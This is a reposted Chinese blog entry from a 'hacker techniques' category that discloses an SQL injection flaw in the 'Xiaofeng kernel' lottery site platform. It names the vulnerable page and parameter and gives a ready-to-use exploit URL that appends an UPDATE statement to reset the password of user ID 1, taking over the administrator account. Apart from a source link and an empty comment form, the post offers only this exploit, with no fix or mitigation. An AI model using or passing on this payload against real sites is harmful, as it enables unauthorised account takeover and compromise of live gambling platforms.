=波波日志 > 黑客技术 > 晓风内核 彩票整站平台程序漏洞公布=

[转]晓风内核 彩票整站平台程序漏洞公布

该漏洞位于 Room目录下的Chase.aspx文件,由于LotteryID 没有进行安全检查,导致注入漏洞发生。EXP如下

Room/Chase.aspx?LotteryID=28 ; update T_Users Set Password='xx' where ID=1



http://hi.baidu.com/isbx/blog/item/bee2d31b7ab4bdddac6e7521.html
类别:黑客技术 作者:转载 日期:2009-08-31 【评论:0】 
 
暂时没有评论!
发表留言
  • *昵称:
  • 头像:
  • 电子邮件: [留下您的邮件,方便管理员回复您。]
  • 个人网站: *验证码:
声明:本网站尊重并保护知识产权,根据《信息网络传播权保护条例》,如果我们转载或引用的作品侵犯了您的权利,请通知我们,我们会及时删除!
Powered by showbo,©2012,桂ICP备05005887号 京公网安备1101055090